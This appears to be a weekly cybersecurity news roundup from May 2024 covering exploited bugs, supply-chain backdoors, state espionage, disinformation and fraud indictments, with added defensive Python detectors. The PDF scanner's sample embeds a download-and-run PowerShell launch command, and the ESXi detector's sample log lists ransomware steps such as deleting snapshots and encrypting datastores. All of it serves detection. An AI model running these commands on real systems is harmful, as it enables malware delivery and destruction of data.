24 May 2024

Cyber Security Week in Review: May 24, 2024


Google fixes Chrome zero-day, CISA adds Apache Flink bug to its KEV catalog

Google has released security updates for Chrome (125.0.6422.112/.113 for Windows and Mac, 125.0.6422.112 for Linux) to address an actively exploited high-severity flaw. Tracked as CVE-2024-5274, the vulnerability is a type confusion bug in the V8 JavaScript engine; a crafted web page can use it to corrupt memory and execute code inside the renderer. Google has not shared details of the in-the-wild exploitation.

The US Cybersecurity and Infrastructure Security Agency (CISA) has added an Apache Flink bug (CVE-2020-17519) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The flaw is a directory traversal in the JobManager's REST API in Flink 1.11.0 through 1.11.2 that lets an unauthenticated remote attacker read any file the JobManager process can read; it was fixed in 1.11.3 and 1.12.0. The bug is more than three years old, so exposure now comes down to unpatched, internet-facing JobManagers.

A backdoor found in JAVS software

Attackers have compromised the installer for the widely used Justice AV Solutions (JAVS) courtroom video recording software, adding a malicious fffmpeg.exe (three f's, as opposed to the legitimate ffmpeg.exe) that belongs to the RustDoor backdoor family and gives the attackers control of the infected system. JAVS has since removed the affected version from its official website, stating that the trojanized installer “did not originate from JAVS or any 3rd party associated with JAVS.”

Cybersecurity firm Rapid7, which discovered the supply chain attack, has published an analysis of it; the issue is now tracked as CVE-2024-4978. Rapid7 advises that deleting the binary is not enough: hosts that ran the trojanized installer should be re-imaged and every credential used on them rotated.

China-linked cyber spies target military and gov't entities in the South China Sea region

A previously unknown threat actor, dubbed ‘Unfading Sea Haze’ by Bitdefender, has been targeting military and government entities in the South China Sea region since 2018. The group's operations are aligned with Chinese geopolitical interests and focus on intelligence collection and espionage. Unfading Sea Haze shares tactics, techniques, and tools with other Chinese state-sponsored groups, particularly APT41. The group's initial access vector remains unknown, but one identified method of regaining access to previously compromised networks is spear-phishing emails carrying malicious archives. These archives contain LNK (Windows shortcut) files disguised as documents that execute malicious commands when opened.
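The lure described above, a shortcut named to look like a document inside an archive, is easy to catch at the mail gateway or in a sandbox by looking at the entry content rather than the name. The following scanner is an added example, not code from Bitdefender's report; the archive it scans is constructed in memory with hypothetical file names so the script runs offline.

```python
"""Flag Windows shortcut (.lnk) entries inside a zip archive, including ones
whose name is dressed up as a document (e.g. 'Agenda.pdf.lnk').

Added example; the sample archive and its entry names are constructed.
"""
import io
import zipfile

# A ShellLink file starts with HeaderSize 0x0000004C followed by the CLSID
# 00021401-0000-0000-C000-000000000046 (Data1..Data3 little-endian).
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "0000" "0000" "c000000000000046")

DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx",
                       ".ppt", ".pptx", ".txt", ".rtf")


def disguised_as_document(name: str) -> bool:
    """True for names like 'Agenda.pdf.lnk' whose inner extension is a document type."""
    lower = name.lower()
    if not lower.endswith(".lnk"):
        return False
    return lower[:-4].endswith(DOCUMENT_EXTENSIONS)


def scan_archive(data: bytes) -> list:
    """Return (entry name, verdict) for every shortcut found in a zip archive.

    An entry counts as a shortcut if it carries the .lnk extension *or* its
    content starts with the ShellLink header, so a renamed shortcut is still
    reported even though the name alone would not give it away.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            is_shortcut = head == LNK_MAGIC or info.filename.lower().endswith(".lnk")
            if not is_shortcut:
                continue
            if disguised_as_document(info.filename):
                findings.append((info.filename, "shortcut disguised as document"))
            else:
                findings.append((info.filename, "shortcut"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a lure archive with one disguised shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Only the 20-byte header is real; a genuine shortcut would also carry
        # its target path and command-line arguments after it.
        zf.writestr("Meeting_Agenda.pdf.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("tools/cleanup.lnk", LNK_MAGIC + b"\x00" * 56)
        zf.writestr("Notes.docx", b"PK\x03\x04 placeholder docx bytes")
    return buf.getvalue()


SAMPLE_ARCHIVE = build_sample_archive()

if __name__ == "__main__":
    for name, verdict in scan_archive(SAMPLE_ARCHIVE):
        print(f"{verdict:32} {name}")
```

Windows Explorer never displays the .lnk extension, even when "hide extensions for known file types" is turned off, so a user sees `Meeting_Agenda.pdf` with a PDF-like icon; that is why the check has to happen before the archive reaches the desktop.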

Chinese APTs increasingly using ORB networks to mask attack infrastructure

China-linked threat actors are leveraging Operational Relay Box (ORB) networks to mask their attack infrastructure, according to a new report from Google’s cybersecurity subsidiary Mandiant. ORB networks are meshes of rented virtual private servers and compromised end-of-life routers and IoT devices that proxy the attackers' traffic, so the IP addresses a defender sees belong to the relays rather than to the operators. Because relay nodes churn frequently, indicator-based blocking of ORB addresses loses value quickly. Mandiant says it is actively monitoring several ORB networks, the most notable being SPACEHOP and FLORAHOX, used by groups such as APT5 and APT31, respectively.

Speaking of Chinese hackers, cybersecurity company Check Point has observed the Chinese cyberespionage group Sharp Panda expanding its operations to Africa and the Caribbean. The new campaign, now tracked as Sharp Dragon, adopts Cobalt Strike Beacon as the payload, which provides backdoor functionality such as command-and-control (C2) communication and command execution while minimizing the exposure of the group’s custom tools.

On the same note, a cyber espionage group linked to China, known as Mustang Panda, has been accused of deploying malware over the past five months to infiltrate computer systems of cargo shipping companies in Norway, Greece, and the Netherlands.

Russia’s DoppelGänger campaign manipulates social media to undermine Western support for Ukraine

Security researchers have uncovered a sophisticated Russian disinformation campaign that has been actively challenging the credibility of journalists and fact-checkers since May 2022. This campaign, leveraging X (formerly Twitter), disseminates disinformation articles while engaging in commenting and sharing activities to provoke further investigation.

The primary objective of the DoppelGänger campaign is to lessen support for Ukraine amid Russian aggression and to foster divisions within the nations that support Ukraine. The campaign has targeted audiences in France, Germany, Ukraine, the United States, and several other countries, including the United Kingdom, Lithuania, Switzerland, Slovakia, and Italy. In recent months, its disinformation narratives have also targeted Israel, primarily as a way to undermine the United States through its alliance with Israel.

A recent investigation by the German publication Correctiv found that Russian hackers and the “Doppelgänger” disinformation network are using services from the Moldovan company PQ Hosting. This allows them to operate from servers in the Netherlands, evading sanctions and governmental countermeasures. PQ Hosting, owned by brothers Ivan and Yuri Neculiti from the unrecognized Transnistrian region, has an office in Chisinau and mainly serves Russian clients despite international sanctions. Ivan Neculiti acknowledged that Russian users use the company’s EU-based servers to bypass sanctions.

In 2022, Ivan established Stark Industries Solutions Limited in London, which Yuri now runs. The company obscures its connection to PQ Hosting, and through it servers in a Dutch data center are managed for pro-Russian hacker groups such as NoName057(16), the GRU-associated Sandworm, and Blue Charlie (engaged in espionage and data theft against Ukraine and NATO countries), as well as for politically motivated cyber attacks. Notably, PQ Hosting's Dutch servers hosted the RRN site, part of a Russian disinformation network that mimics credible news websites.

In related news, TikTok announced that in the first four months of the year, it disrupted 15 influence operations and removed 3,001 associated accounts. Most networks aimed to influence upcoming elections within their own countries. Only two networks, based in China and Iran, targeted foreign audiences with pro-PRC and anti-US content, respectively. The largest influence networks were located in Serbia, Indonesia, and Venezuela.

Hackers target orgs in Ukraine with SmokeLoader malware

The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) has reported a significant increase in activity from the financially motivated threat actor it tracks as UAC-0006. Since May 20, 2024, the group has launched at least two distinct campaigns distributing the SmokeLoader malware.

Additionally, CERT-UA has warned of a malicious activity cluster, tracked as UAC-0188, that targets Ukrainian organizations with phishing emails containing a link to a .SCR file hosted on Dropbox. When executed, the file downloads the legitimate SuperOps RMM software onto the computer, giving the threat actors remote access to the compromised system.

Iranian Void Manticore continues destructive activities in Israel

Check Point has released a report on Void Manticore, an Iranian threat group affiliated with the Ministry of Intelligence and Security (MOIS), highlighting its activities against Israel. These include destructive wiper attacks targeting Windows and Linux systems, as well as manual file deletion. Void Manticore also engages in influence operations. The report identifies significant overlap in victimology with Scarred Manticore (also known as Storm-0861), suggesting collaboration between the two groups.

Threat actors are abusing Foxit PDF Reader flaw to deploy multiple malware variants

Multiple threat actors have been exploiting a design flaw in Foxit PDF Reader to distribute a range of malware, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. According to a technical report by Check Point, the flaw lies in how Foxit PDF Reader handles the security warnings it shows before running potentially risky features of a document. The first warning presents “OK” as the default button; if the user clicks it, a second warning appears with “Open” as the default. Accepting both runs the document's launch action, which executes a command that downloads and runs a malicious payload hosted on Discord's content delivery network (CDN). This is not a memory-safety bug: the exploit depends entirely on users accepting the defaults, and Adobe Acrobat Reader, which handles the same action differently, is not affected.
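The documents in this campaign carry a PDF launch action (`/S /Launch`) that names a program and its parameters; that action is visible in the PDF syntax itself, so it can be triaged without opening the file. The scanner below is an added example and not part of Check Point's report; the PDF it parses is constructed inline with a hypothetical download URL, and the token list used to rate a command as suspicious is the author's own.

```python
"""Find PDF launch actions and report what they would execute.

Added example. SAMPLE_PDF is a constructed minimal document whose catalog
auto-runs a Launch action; the URL in it is hypothetical.
"""
import re

LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
# /F and /P literal strings: either a backslash escape or any byte except '\' and ')'
FILE_RE = re.compile(rb"/F\s*\((?P<s>(?:\\.|[^\\)])*)\)")
PARAMS_RE = re.compile(rb"/P\s*\((?P<s>(?:\\.|[^\\)])*)\)")
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b")
OPENACTION_REF_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R\b")

# Heuristic list of strings a benign launch target rarely contains (author's choice).
SUSPICIOUS_TOKENS = (b"cmd", b"powershell", b"mshta", b"wscript", b"cscript",
                     b"rundll32", b"certutil", b"bitsadmin", b"http")


def decode_pdf_string(raw: bytes) -> bytes:
    """Resolve the backslash escapes allowed inside a PDF literal string."""
    simple = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
              b"(": b"(", b")": b")", b"\\": b"\\"}
    out = bytearray()
    i = 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            if nxt in simple:
                out += simple[nxt]
                i += 2
                continue
            if nxt in b"01234567":  # \ddd octal escape, up to three digits
                digits = raw[i + 1:i + 4]
                k = 0
                while k < len(digits) and digits[k:k + 1] in b"01234567":
                    k += 1
                out.append(int(digits[:k], 8) & 0xFF)
                i += 1 + k
                continue
        out += c
        i += 1
    return bytes(out)


def enclosing_object(pdf: bytes, pos: int):
    """Number of the 'N G obj' whose body contains pos (None if outside any object)."""
    last = None
    for m in OBJ_RE.finditer(pdf, 0, pos):
        last = int(m.group(1))
    return last


def find_launch_actions(pdf: bytes) -> list:
    """Return one record per Launch action found by scanning the raw PDF bytes."""
    auto_open_objects = {int(n) for n in OPENACTION_REF_RE.findall(pdf)}
    findings = []
    for m in LAUNCH_RE.finditer(pdf):
        body = pdf[m.end(): m.end() + 1024]          # rest of the action dictionary
        f = FILE_RE.search(body)
        p = PARAMS_RE.search(body)
        target = decode_pdf_string(f.group("s")) if f else b""
        params = decode_pdf_string(p.group("s")) if p else b""
        obj = enclosing_object(pdf, m.start())
        # Auto-run if the catalog points /OpenAction at this object, or the
        # action dictionary is written inline right after /OpenAction.
        inline_open = b"/OpenAction" in pdf[max(0, m.start() - 256): m.start()]
        command = (target + b" " + params).lower()
        findings.append({
            "object": obj,
            "target": target.decode("latin-1"),
            "params": params.decode("latin-1"),
            "auto_open": bool(inline_open or obj in auto_open_objects),
            "suspicious": any(tok in command for tok in SUSPICIOUS_TOKENS),
        })
    return findings


# Constructed sample: catalog -> /OpenAction -> object 4, a Launch action
# that starts cmd.exe with a PowerShell download-and-run one-liner.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /S /Launch /Win << /F (cmd.exe) /P (/c powershell -w hidden -c "iwr https://files.example.invalid/payload.exe -o %TEMP%\\\\p.exe; %TEMP%\\\\p.exe") >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for hit in find_launch_actions(SAMPLE_PDF):
        print(hit)
```

Two limits to keep in mind: a byte scan does not see objects packed into compressed object streams or strings written in hex form, so run the PDF through a decompressing tool (qpdf's `--qdf` mode, for instance) before scanning; and a launch action is also a legitimate PDF feature, which is why the result is a triage score rather than a verdict.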

SMS scammers are using Amazon, Google and IBM Cloud Services to steal customer data

Security researchers have uncovered scam campaigns abusing cloud storage services such as Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage. The unidentified threat actors host static web pages in storage buckets and send the bucket URLs in SMS messages; the pages then redirect the victim's browser to a site that harvests their information. Using the providers' domains serves two goals: getting the links past URL filtering that trusts well-known cloud domains, and making the messages look legitimate to recipients.

The Grandoreiro malware is back up and running after January disruption

The cybercriminals behind the Windows-based Grandoreiro banking trojan have resurfaced with a global phishing campaign, despite a law enforcement takedown in January 2024 aimed at dismantling the group's operations. According to IBM X-Force, the large-scale phishing attacks, ongoing since March 2024, now target customers of more than 1,500 banks in over 60 countries across Central and South America, Africa, Europe, and the Indo-Pacific region. Previously, Grandoreiro's campaigns were mostly limited to Latin America, Spain, and Portugal.

BloodAlchemy malware is used in attacks on gov’t organizations in Southern and Southeastern Asia

Japanese cybersecurity firm ITOCHU Cyber & Intelligence has published a report on a strain of malware called ‘BloodAlchemy’ used in attacks targeting government organizations in Southern and Southeastern Asia. The researchers found that BloodAlchemy is an updated version of Deed RAT, which is believed to be a successor to ShadowPad.

Researchers warn of an increase in ransomware attacks targeting VMware ESXi infrastructure

Sygnia’s Incident Response team has observed a significant rise in ransomware attacks targeting virtualized environments, particularly VMware ESXi infrastructure. Ransomware groups such as LockBit, HelloKitty, BlackMatter, RedAlert (N13V), Scattered Spider, Akira, Cactus, BlackCat, and Cheerscrypt frequently go after this vector, the researchers found, because encrypting a hypervisor's datastores takes down every virtual machine on it at once.

The typical attack pattern includes:

  • Gaining initial access via phishing, malicious downloads, or exploiting vulnerabilities in internet-facing assets.

  • Escalating privileges to access ESXi hosts or vCenter credentials through brute-force attacks or other techniques.

  • Validating access to the virtualization infrastructure and deploying ransomware.

  • Deleting or encrypting backup systems or changing passwords to hinder recovery.

  • Exfiltrating data to external locations like Mega.io or Dropbox.

  • Executing ransomware to encrypt the "/vmfs/volumes" folder on the ESXi filesystem.

  • Spreading ransomware to non-virtualized servers and workstations to expand the attack's impact.
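Several of the steps above leave a trace in the hypervisor's own shell history, `/var/log/shell.log`, which records every command typed in the ESXi shell or over SSH. The following detector is an added example rather than Sygnia's own tooling: it maps shell.log commands onto the stages of the attack pattern and alerts when several stages appear on one host within a short window. The log lines it runs over are constructed, as are the rule patterns, which cover the most common commands for each stage and not every variant.

```python
"""Stage-based detection of an ESXi ransomware run from /var/log/shell.log.

Added example; the log lines below are constructed and the rules are a
starting set, not an exhaustive one.
"""
import re
from datetime import datetime, timedelta

# shell.log line: <ISO timestamp> shell[<pid>]: [<user>]: <command>
LINE_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# (stage, pattern over the command). First matching rule wins.
RULES = [
    ("recon", re.compile(r"\besxcli vm process list\b|\bvim-cmd vmsvc/getallvms\b")),
    ("kill_vms", re.compile(r"\besxcli vm process kill\b|\bvim-cmd vmsvc/power\.off\b")),
    # turning off execInstalledOnly lets unsigned binaries run; password changes
    # and enabling SSH are the "hinder recovery / keep access" moves
    ("weaken_host", re.compile(r"execInstalledOnly|esxcli system account set\b.*\s-p\b|hostsvc/enable_ssh")),
    ("destroy_backups", re.compile(r"vmsvc/snapshot\.removeall|\brm\b.*\.(?:vbk|bak)\b")),
    ("encrypt", re.compile(r"\bchmod \+x\b|\S*(?:crypt|locker)\S*\s+\S*/vmfs/volumes")),
]


def analyze(lines, window=timedelta(hours=6), min_stages=3):
    """Score a host's shell.log; alert when >= min_stages stages fall inside `window`."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        for stage, rx in RULES:
            if rx.search(m["cmd"]):
                hits.append((ts, stage, m["cmd"]))
                break
    hits.sort()
    # Sliding window: the densest set of distinct stages starting at any hit.
    best = set()
    for i, (start, _, _) in enumerate(hits):
        stages = {s for t, s, _ in hits[i:] if t - start <= window}
        if len(stages) > len(best):
            best = stages
    return {"alert": len(best) >= min_stages, "stages": sorted(best), "hits": hits}


# Constructed: an intrusion that walks the stages in under three minutes.
MALICIOUS_LOG = """
2024-05-20T01:12:03Z shell[2100123]: [root]: esxcli vm process list
2024-05-20T01:12:40Z shell[2100123]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 0
2024-05-20T01:13:05Z shell[2100123]: [root]: vim-cmd vmsvc/snapshot.removeall 12
2024-05-20T01:13:30Z shell[2100123]: [root]: esxcli vm process kill -t force -w 2100456
2024-05-20T01:14:02Z shell[2100123]: [root]: chmod +x /tmp/encrypt
2024-05-20T01:14:05Z shell[2100123]: [root]: /tmp/encrypt /vmfs/volumes/datastore1/
""".strip().splitlines()

# Constructed: an administrator listing VMs and browsing a datastore.
BENIGN_LOG = """
2024-05-21T09:00:00Z shell[2100999]: [root]: esxcli vm process list
2024-05-21T09:00:30Z shell[2100999]: [root]: ls -la /vmfs/volumes/datastore1/
""".strip().splitlines()

if __name__ == "__main__":
    for name, log in (("malicious", MALICIOUS_LOG), ("benign", BENIGN_LOG)):
        result = analyze(log)
        print(f"{name}: alert={result['alert']} stages={result['stages']}")
```

The detector only helps if the log survives: forward shell.log and hostd.log to an external syslog collector, since an attacker with root on the host can clear the local copy, and the local log is lost on reboot when the scratch partition is not persistent. Keeping `execInstalledOnly` enabled and SSH off unless needed removes two of the steps outright.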

Threat actors exploit vulnerable drivers to disable EDRs in cryptojacking attack

A new cryptojacking campaign is using vulnerable drivers to disable security software on Windows systems. Elastic Security Labs attributes the campaign to a threat actor it tracks as REF4578, whose miner loader is dubbed 'GHOSTENGINE'. The technique is known as Bring Your Own Vulnerable Driver (BYOVD): rather than exploiting the victim's own drivers, the attacker drops legitimately signed but exploitable third-party drivers (in this campaign, Avast's aswArPot.sys and IObit's IObitUnlockers.sys) and uses their kernel-mode primitives to terminate Endpoint Detection and Response (EDR) processes. The primary objective is to blind EDR products so the miner runs undetected.
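Because BYOVD drivers carry a valid signature, "is it signed?" is not a useful question; "which driver, from where?" is. Sysmon event ID 6 (Driver loaded) records the image path, hashes, and signer for every kernel driver load, which is enough to triage. The script below is an added example and not Elastic's detection logic; the events it parses are constructed, the hash values in them are placeholders, and the driver-name list should in practice be replaced by hash entries from Microsoft's vulnerable driver blocklist or loldrivers.io.

```python
"""Triage Sysmon 'Driver loaded' (event ID 6) records for BYOVD activity.

Added example. SAMPLE_EVENTS is constructed; the Hashes values are
placeholders and testdrv.sys is a hypothetical driver name.
"""
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Signed drivers with known exploitable primitives. Keyed by name here for
# readability; key on SHA256 in production, since a name is trivially changed.
KNOWN_VULNERABLE_DRIVERS = {"aswarpot.sys", "iobitunlockers.sys"}

# Locations a legitimately installed driver has no reason to be loaded from.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\",
                          "c:\\windows\\temp\\", "c:\\temp\\")


def parse_driver_loads(xml_text: str) -> list:
    """Return the EventData fields of every event ID 6 record in the XML."""
    root = ET.fromstring(f"<Events>{xml_text}</Events>")
    events = []
    for ev in root.iter(f"{NS}Event"):
        if ev.findtext(f"{NS}System/{NS}EventID") != "6":
            continue
        events.append({d.get("Name"): (d.text or "") for d in ev.iter(f"{NS}Data")})
    return events


def triage(xml_text: str) -> list:
    """Flag driver loads by name, load path and signature state."""
    findings = []
    for ev in parse_driver_loads(xml_text):
        path = ev.get("ImageLoaded", "")
        name = path.rsplit("\\", 1)[-1].lower()
        reasons = []
        if name in KNOWN_VULNERABLE_DRIVERS:
            reasons.append("known vulnerable driver")
        if path.lower().startswith(USER_WRITABLE_PREFIXES):
            reasons.append("loaded from user-writable path")
        if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
            reasons.append("signature missing or invalid")
        if reasons:
            findings.append({"driver": path, "signer": ev.get("Signature", ""),
                             "reasons": reasons})
    return findings


# Constructed events: a BYOVD load, a normal Microsoft driver, and an unsigned one.
SAMPLE_EVENTS = r"""
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>6</EventID></System>
  <EventData>
    <Data Name="UtcTime">2024-05-20 03:14:07.000</Data>
    <Data Name="ImageLoaded">C:\Windows\Temp\aswArPot.sys</Data>
    <Data Name="Hashes">SHA256=PLACEHOLDER_CONSTRUCTED_HASH_1</Data>
    <Data Name="Signed">true</Data>
    <Data Name="Signature">Avast Software s.r.o.</Data>
    <Data Name="SignatureStatus">Valid</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>6</EventID></System>
  <EventData>
    <Data Name="UtcTime">2024-05-20 03:14:09.000</Data>
    <Data Name="ImageLoaded">C:\Windows\System32\drivers\tcpip.sys</Data>
    <Data Name="Hashes">SHA256=PLACEHOLDER_CONSTRUCTED_HASH_2</Data>
    <Data Name="Signed">true</Data>
    <Data Name="Signature">Microsoft Windows</Data>
    <Data Name="SignatureStatus">Valid</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>6</EventID></System>
  <EventData>
    <Data Name="UtcTime">2024-05-20 03:14:11.000</Data>
    <Data Name="ImageLoaded">C:\Windows\System32\drivers\testdrv.sys</Data>
    <Data Name="Hashes">SHA256=PLACEHOLDER_CONSTRUCTED_HASH_3</Data>
    <Data Name="Signed">false</Data>
    <Data Name="Signature"></Data>
    <Data Name="SignatureStatus">Unavailable</Data>
  </EventData>
</Event>
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["driver"], hit["signer"], hit["reasons"])
```

The aswArPot.sys record in the sample is signed and valid, and is still the one that matters; the signature check catches the separate case of an unsigned driver on a machine with test-signing or a loader bypass enabled. Turning on Microsoft's vulnerable driver blocklist (part of HVCI / Core Isolation memory integrity) blocks the known-bad drivers at load time rather than after the fact.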

Chinese nationals indicted in $73M cryptocurrency money laundering scheme

Two Chinese nationals have been charged in connection with a sophisticated international money laundering scheme that funneled the proceeds of cryptocurrency investment scams. The indictment accuses Daren Li, 41, and Yicheng Zhang, 38, of playing pivotal roles in a network that moved over $73 million through US financial institutions to accounts in the Bahamas and converted it into the cryptocurrency Tether (USDT).

A Russian access broker indicted in the US

Evgeniy Doroshenko, a 31-year-old Russian citizen also known as “Eugene Doroshenko,” “FlankerWWH,” and “Flanker,” has been indicted for wire fraud and computer-related fraud. According to court documents, between February 2019 and May 2024, Doroshenko operated as an “access broker,” illegally accessing various computer systems and selling this unauthorized access for profit on a Russian-language cybercrime forum.

The charge of wire fraud carries a maximum penalty of 20 years in prison and a fine of $250,000, or twice the gross amount of gain or loss resulting from the offense, whichever is greater. The charge of computer fraud carries a maximum penalty of five years in prison and a fine of $250,000, or twice the gross amount of gain or loss resulting from the offense, whichever is greater.

A Coinbase scammer pleads guilty

Chirag Tomar, a 30-year-old Indian citizen, admitted his guilt in orchestrating a scheme that stole over $37 million through a spoofing scam involving the Coinbase website. Victims were deceived into entering their login credentials on a fake Coinbase site, enabling fraudsters to access their real accounts. Some were tricked into providing authentication details or allowing remote access to their computers, while others were misled by fraudsters posing as Coinbase customer service representatives to divulge two-factor authentication codes over the phone.

Tomar faces up to 20 years in prison and a $250,000 fine for wire fraud conspiracy, with sentencing yet to be scheduled.

Incognito Market owner arrested in the US, faces life in prison

Rui-Siang Lin, also known as Ruisiang Lin, “Pharoah,” and “faro,” was arrested and charged with allegedly running “Incognito Market,” one of the largest illegal narcotics marketplaces on the dark web. The 23-year-old Taiwanese national faces a series of severe charges that could lead to life in prison. According to the complaint and indictment, Lin operated Incognito Market from its inception in October 2020 until its closure in March 2024. During this period, the marketplace facilitated the sale of more than $100 million worth of illegal narcotics, including hundreds of kilograms of cocaine and methamphetamine, to users worldwide.
